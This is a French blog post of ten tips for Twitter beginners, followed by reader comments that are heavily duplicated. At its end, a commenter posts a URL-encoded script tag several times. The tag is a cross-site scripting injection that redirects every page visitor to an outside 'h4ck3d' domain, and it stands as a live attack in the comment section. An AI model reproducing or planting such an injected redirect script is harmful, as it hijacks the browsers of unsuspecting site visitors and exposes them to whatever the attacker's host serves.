twitter-3
Twitter via Shutterstock

10 principes que les débutants sur Twitter doivent comprendre

10 fondamentaux Twitter

Il y a quelques jours, alors que j’expliquais à un ami comment créer puis profiter de son compte Twitter, je découvrais que présenter le principe ou encore le fonctionnement de ce site de microblogging ne suffisait pas. Car faire comprendre que l’utilisation de Twitter se résume uniquement à partager des tweets de 140 caractères est une chose fausse ; il existe un certain nombre de principes de base qu’il est difficile de percevoir lorsque l’on n’est pas épaulé dans ses premières démarches.

Je me permets donc de vous proposer « 10 principes que les débutants sur Twitter doivent comprendre », qui je l’espère permettront aux nouveaux twittonautes de prendre conscience de l’importance de certains aspects qu’il conviendrait de négliger en temps normal. Je vous souhaite une agréable lecture, n’oubliez pas que si vous avez des questions ou la moindre remarque à me faire parvenir, vous pouvez me retrouver sur Twitter sous le pseudo @Kriisiis.


1. Twitter n’est pas vraiment attrayant lors de votre inscription

Vous pensez pouvoir en profiter pleinement rapidement… A force d’en entendre parler, ou de voir ses proches l’utiliser à longueur de journée, on fini par se persuader qu’il suffit de quelques clics et de quelques secondes pour entrer dans un univers ultra-social, dans une communauté.

…Mais devrez comprendre que l’appétit vient en mangeant. Vos premières semaines seront assez calmes, il y a même de grandes chances pour que vous ayez très peu de contacts et de discussions. Seul le temps et la création d’un réseau vous fera apprécier convenablement l’outil. Patience !

[Lecture recommandée : 25 recommandations à faire pour lancer ses amis sur Twitter]


2. La personnalisation de votre profil fait « toute » la différence

Vous pourriez -à juste titre- supposer que ce n’est pas prioritaire… Sur la plupart des réseaux sociaux, il n’est pas primordial de personnaliser votre profil. Qui d’entre-nous a rempli chaque ligne de chaque rubrique de son profil sur Facebook ? Pire, qui pourrait s’intéresser à tout ça ?

…Mais vous serez toujours mi sur la touche si vous ne le faites pas. Pourtant, sur Twitter, vous serez systématiquement considéré comme un internaute « faisant les choses à moitié » si vous n’avez pas rempli votre description, peaufiné votre background, ou si vous avez oublié d’ajouter votre avatar.

[Lecture recommandée : 25 Conseils pour créer le background de votre compte Twitter]


3. Ne pas comprendre le vocabulaire revient à bâcler son adoption

On pourrait supposer que cela n’a pas tellement d’importance… Depuis quand faut-il savoir ce qu’est un « poke » sur Facebook ou un « Hub » sur Viadeo pour profiter convenablement de l’outil ? Vous pourriez supposer que cela n’est pas indispensable, voire, dans le fond, vraiment inutile.

…Mais vous serez vite dépassé si vous ne parlez pas la même langue. Dans le monde de Twitter, on tweete des tweets avec des twittos ou des twittonautes, on participe à des twapéros ou des twunchs, on fait des followfridays ; cette règle a toujours été, et il vous faudra vous adapter.

[Lecture recommandée : Le Guide du Débutant sur Twitter en 80 points]


4. Les partages sur Twitter sont bilatéraux et non pas à sens unique

Twitter vous permet de partager tout type de données… C’est exact. On peut partager de tout et de rien sur Twitter, aussi bien des vidéos drôles issues de Youtube que des articles plus sérieux issus du Monde, sans oublier des liens vers ses photos favorites ou un évènement à promouvoir.

…Mais vous lassera très vite si vous vous limitez à cela. Twitter permet non seulement de mettre en avant des données, mais également d’en découvrir. Un mot à retenir ? « Participatif ». C’est en participant à la vie de Twitter (retweets, lectures, discussions) que vous prendrez vraiment du plaisir.

[Lecture recommandée : 10 conseils pour perdre un minimum de followers sur Twitter]


5. La visibilité engendrée par les réponses reste à modérer

Provoquer des réponses peut générer de la visibilité… Lorsqu’une personne répond à l’une de vos questions, votre pseudo s’affiche dans sa timeline. Il pourra donc potentiellement être « cliqué » puis « suivi » par les twittonautes qui se seront intéressé au profil de la personne en question.

…Mais surtout auprès de ceux qui vous suivent déjà. Sa réponse ne s’affichera cependant qu’aux yeux des twittonautes qui vous suivent déjà ! Or si vous avez peu de followers, il parait presque certain que le tweet n’apparaitra que sur très peu de timelines… d’où un intérêt à reconsidérer.

[Lecture recommandée : 10 détails qui crédibiliseront subtilement votre compte sur Twitter]


6. Les retweets sont à l’origine de la plupart des nouveaux followers

Vous accentuerez votre visibilité en étant retweeté… Certainement ! Mes quelques milliers de followers ne sont issus que de quelques milliers de retweets, je ne le vous cache pas. Votre pseudo apparaît alors dans toutes les timelines des followers de vos retweeters, d’où un grand intérêt.

…Mais pousser au retweet peut provoquer l’effet inverse. Malheureusement, les retweets dépendent avant tout de l’intérêt de la donnée partagée, et non pas de vos efforts à souhaiter la voir s’étaler à travers la toile. Accordez donc plutôt un intérêt immense à la qualité de vos tweets.

[Lecture recommandée : 10 conseils pour être retweeté un maximum sur Twitter]


7. Twitter sans ses outils annexes est un monde sans couleur

On peut prendre du plaisir à utiliser Facebook sans outil… C’est indéniable. Nous ne ressentons pas toujours le besoin d’utiliser des applications telles que « Tigerlily » ou « Youtube Box » pour agrémenter sa fan-page, ni « Skype Me » ou « Web profiles » pour ce qui est de son profil.

…Mais la richesse de Twitter vient de l’environnement qui l’entoure. A l’inverse, Twitter n’est vraiment attractif que lorsqu’il est couplé aux milliers d’applications ou autres outils de veille, de statistiques, de géolocalisation, de raccourcissement d’url, ou plus simplement… de partage.

[Lecture recommandée : 40 outils pour agrémenter votre utilisation de Twitter]


8. Vous ne pourrez pas toujours répondre aux messages privés

Une personne suivie peut vous envoyer un message privé… Vous le remarquerez sans doute, il arrive de temps en temps de recevoir des messages privés (ou « DM » pour « Direct Messages ») sur Twitter, mais exclusivement de la part de personnes que vous « followez » via votre compte.

…Mais vous ne pourrez pas lui répondre si elle ne vous suit pas. Ces personnes peuvent en effet vous écrire en privé car vous les suivez. Il sera donc courant que vous ne puissiez pas leur répondre si ces twittonautes ne vous suivent pas en retour… ou alors tout simplement via une « reply » ?

[Lecture recommandée : 10 conseils pour se constituer une base de following sur Twitter]


9. Il est difficile d’entrer en contact avec les twittonautes « stars »

La logique voudrait qu’on croie que c’est par vanité ou par orgueil… Les twittonautes ont tendance à croire qu’un profil « star » néglige ses followers, d’où l’absence (très) fréquente de réponse de leur part lorsqu’une question est posée. Et à première vue, tout semble indiquer que c’est vrai.

…Mais les raisons sont tout autres, et généralement très logiques. Il y a en effet un enjeu. Plus la notoriété est importante, plus les attentes vis-à-vis de leurs tweets le sont. Il leur est donc généralement difficile de donner des réponses publiques sans contrarier certains followers.

[Lecture recommandée : Le Choc des Tweetants : entre puissance de partage et influence]


10. Sur Twitter, les erreurs coûtent cher, très cher

Un tweet devrait pouvoir passer inaperçu parmi les autres… On imagine facilement qu’un tweet se retrouve rapidement noyé parmi des milliers (puis millions) d’autres, et que de formuler un tweet n’entrant pas en accord avec les attentes-mêmes des followers n’est pas si grave que ça.

…Mais vous comprendrez vite que ce n’est pas du tout le cas. Le « unfollow » sur Twitter se fait plus d’une fois sur deux sur un coup de tête. Alors que supprimer un de ses « amis » sur Facebook relève presque du sacrilège, le geste est banal sur Twitter, et à terme, les pertes peuvent être importantes.

[Lecture recommandée : 20 erreurs à ne pas commettre sur Twitter]

Si vous avez la moindre question, ou la moindre amélioration à apporter au contenu de cet article, n’hésitez pas à m’en faire part dans les commentaires de cet article. En attendant, je vous propose de me retrouver sur Facebook, en m’ajoutant à vos contacts (Christophe Ramel) ou en devenant fan de Kriisiis.fr. Vous pouvez également me retrouver sur Twitter (@Kriisiis) !

  • En tant que twittonautes débutant je ne peux qu’apprécier tes conseils et je m’engage à tout lire et essayer de mettre en pratique.Merci à toi.

  • En tant que twittonautes débutant je ne peux qu’apprécier tes conseils et je m’engage à tout lire et essayer de mettre en pratique.Merci à toi.

  • Anonyme

    Bonjour Noël,

    Je te remercie pour l’intérêt que tu portes à mes différents articles !
    N’hésite pas à me solliciter si tu as besoin de conseils.

    Kriisiis

  • Anonyme

    Bonjour Noël,

    Je te remercie pour l’intérêt que tu portes à mes différents articles !
    N’hésite pas à me solliciter si tu as besoin de conseils.

    Kriisiis

  • iPhilP

    Encore un article clair, précis et surtout instructif. Merci encore.

  • iPhilP

    Encore un article clair, précis et surtout instructif. Merci encore.

  • En tant que twittonautes débutant je ne peux qu'apprécier tes conseils et je m'engage à tout lire et essayer de mettre en pratique.Merci à toi.

  • En tant que twittonautes débutant je ne peux qu'apprécier tes conseils et je m'engage à tout lire et essayer de mettre en pratique.Merci à toi.

  • Anonyme

    Bonsoir Christophe, merci pour ce guide. Indispensable, claire et précis. Je vais appliquer avec plaisir. A+

  • Anonyme

    Bonsoir Christophe, merci pour ce guide. Indispensable, claire et précis. Je vais appliquer avec plaisir. A+

  • Kriisiis

    Bonjour Noël,

    Je te remercie pour l'intérêt que tu portes à mes différents articles !
    N'hésite pas à me solliciter si tu as besoin de conseils.

    Kriisiis

  • Kriisiis

    Bonjour Noël,

    Je te remercie pour l'intérêt que tu portes à mes différents articles !
    N'hésite pas à me solliciter si tu as besoin de conseils.

    Kriisiis

  • iPhilP

    Encore un article clair, précis et surtout instructif. Merci encore.

  • iPhilP

    Encore un article clair, précis et surtout instructif. Merci encore.

  • Bon article, sans aucun doute. J’aurais juste préciser en introduction qu’il faut demander à celui qui débute quel apport il attend de Twitter. La plupart des personnes que Twitter déçoit sont des utilisateurs qui ont beaucoup entendu parler de ce réseau sans vraiment savoir ce que c’était. Par conséquent certains sont un peu décontenancés par l’aspect un minimaliste de ce service…
    Sinon, belle mise en valeur du RT.

  • Bon article, sans aucun doute. J’aurais juste préciser en introduction qu’il faut demander à celui qui débute quel apport il attend de Twitter. La plupart des personnes que Twitter déçoit sont des utilisateurs qui ont beaucoup entendu parler de ce réseau sans vraiment savoir ce que c’était. Par conséquent certains sont un peu décontenancés par l’aspect un minimaliste de ce service…
    Sinon, belle mise en valeur du RT.

  • lucbisson

    Bonsoir Christophe, merci pour ce guide. Indispensable, claire et précis. Je vais appliquer avec plaisir. A+

  • lucbisson

    Bonsoir Christophe, merci pour ce guide. Indispensable, claire et précis. Je vais appliquer avec plaisir. A+

  • Anonyme

    Bonjour Aurélien,

    Tu as raison, c’est TRÈS important. A chaque fois que j’accompagne quelqu’un dans la création de son compte Twitter, je prends ainsi beaucoup de temps à le questionner sur ses motivations, le temps qu’il compte y investir, pourquoi, quand et comment.

    On ne peut pas « plonger » dans l’univers de Twitter sans préparation.

    Kriisiis

  • Anonyme

    Bonjour Aurélien,

    Tu as raison, c’est TRÈS important. A chaque fois que j’accompagne quelqu’un dans la création de son compte Twitter, je prends ainsi beaucoup de temps à le questionner sur ses motivations, le temps qu’il compte y investir, pourquoi, quand et comment.

    On ne peut pas « plonger » dans l’univers de Twitter sans préparation.

    Kriisiis

  • Jo

    Merci beaucoup pour ces conseils, étant plutôt novice sur Twitter je ne les avait encore pas tous assimilés.

  • Jo

    Merci beaucoup pour ces conseils, étant plutôt novice sur Twitter je ne les avait encore pas tous assimilés.

  • aureliendebord

    Bon article, sans aucun doute. J'aurais juste préciser en introduction qu'il faut demander à celui qui débute quel apport il attend de Twitter. La plupart des personnes que Twitter déçoit sont des utilisateurs qui ont beaucoup entendu parler de ce réseau sans vraiment savoir ce que c'était. Par conséquent certains sont un peu décontenancés par l'aspect un minimaliste de ce service…
    Sinon, belle mise en valeur du RT.

  • aureliendebord

    Bon article, sans aucun doute. J'aurais juste préciser en introduction qu'il faut demander à celui qui débute quel apport il attend de Twitter. La plupart des personnes que Twitter déçoit sont des utilisateurs qui ont beaucoup entendu parler de ce réseau sans vraiment savoir ce que c'était. Par conséquent certains sont un peu décontenancés par l'aspect un minimaliste de ce service…
    Sinon, belle mise en valeur du RT.

  • Kriisiis

    Bonjour Aurélien,

    Tu as raison, c'est TRÈS important. A chaque fois que j'accompagne quelqu'un dans la création de son compte Twitter, je prends ainsi beaucoup de temps à le questionner sur ses motivations, le temps qu'il compte y investir, pourquoi, quand et comment.

    On ne peut pas « plonger » dans l'univers de Twitter sans préparation.

    Kriisiis

  • Kriisiis

    Bonjour Aurélien,

    Tu as raison, c'est TRÈS important. A chaque fois que j'accompagne quelqu'un dans la création de son compte Twitter, je prends ainsi beaucoup de temps à le questionner sur ses motivations, le temps qu'il compte y investir, pourquoi, quand et comment.

    On ne peut pas « plonger » dans l'univers de Twitter sans préparation.

    Kriisiis

  • Jo

    Merci beaucoup pour ces conseils, étant plutôt novice sur Twitter je ne les avait encore pas tous assimilés.

  • Jo

    Merci beaucoup pour ces conseils, étant plutôt novice sur Twitter je ne les avait encore pas tous assimilés.

  • Tout simplement d’accord avec toi. ;-)

  • Tout simplement d’accord avec toi. ;-)

  • Tout simplement d'accord avec toi. ;-)

  • Tout simplement d'accord avec toi. ;-)

  • Salut ! Merci pour cet article, je vois que tu est un grand spécialiste de Twitter !
    Moi, je commence à peine à l’utiliser ( quelques semaines), mais c’est vrai que je n’en voit pas encore le benefice…pourtant je tweete certains de mes billets dessus, mais c’est vrai que j’utilise plus volontiers Facebook…

  • Salut ! Merci pour cet article, je vois que tu est un grand spécialiste de Twitter !
    Moi, je commence à peine à l’utiliser ( quelques semaines), mais c’est vrai que je n’en voit pas encore le benefice…pourtant je tweete certains de mes billets dessus, mais c’est vrai que j’utilise plus volontiers Facebook…

  • Salut ! Merci pour cet article, je vois que tu est un grand spécialiste de Twitter !
    Moi, je commence à peine à l'utiliser ( quelques semaines), mais c'est vrai que je n'en voit pas encore le benefice…pourtant je tweete certains de mes billets dessus, mais c'est vrai que j'utilise plus volontiers Facebook…

  • Salut ! Merci pour cet article, je vois que tu est un grand spécialiste de Twitter !
    Moi, je commence à peine à l'utiliser ( quelques semaines), mais c'est vrai que je n'en voit pas encore le benefice…pourtant je tweete certains de mes billets dessus, mais c'est vrai que j'utilise plus volontiers Facebook…

  • Anonyme

    Lecture indispensable pour comprendre Twitter, réseau plutôt différent des autres réseaux. Je suis débutante et j’imagine qu’il est facile d’abandonner quand on recherche des échanges. On a l’impression au début de parler (ou plutôt twitter) sans que personne ne vous entende. Donc, si j’ai bien compris, il faut persévérer et être patient…

  • Anonyme

    Lecture indispensable pour comprendre Twitter, réseau plutôt différent des autres réseaux. Je suis débutante et j’imagine qu’il est facile d’abandonner quand on recherche des échanges. On a l’impression au début de parler (ou plutôt twitter) sans que personne ne vous entende. Donc, si j’ai bien compris, il faut persévérer et être patient…

  • preciousbox6

    Lecture indispensable pour comprendre Twitter, réseau plutôt différent des autres réseaux. Je suis débutante et j'imagine qu'il est facile d'abandonner quand on recherche des échanges. On a l'impression au début de parler (ou plutôt twitter) sans que personne ne vous entende. Donc, si j'ai bien compris, il faut persévérer et être patient…

  • preciousbox6

    Lecture indispensable pour comprendre Twitter, réseau plutôt différent des autres réseaux. Je suis débutante et j'imagine qu'il est facile d'abandonner quand on recherche des échanges. On a l'impression au début de parler (ou plutôt twitter) sans que personne ne vous entende. Donc, si j'ai bien compris, il faut persévérer et être patient…

  • Hgrtht

    test

  • Hgrtht

    test

  • Hgrtht

    test

  • Hgrtht

    %3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%68%34%63%6B%33%64%2E%77%65%62%75%64%61%2E%63%6F%6D%22%3B%3C%2F%73%63%72%69%70%74%3E

  • Hgrtht

    %3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%68%34%63%6B%33%64%2E%77%65%62%75%64%61%2E%63%6F%6D%22%3B%3C%2F%73%63%72%69%70%74%3E

  • Hgrtht

    %3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%68%34%63%6B%33%64%2E%77%65%62%75%64%61%2E%63%6F%6D%22%3B%3C%2F%73%63%72%69%70%74%3E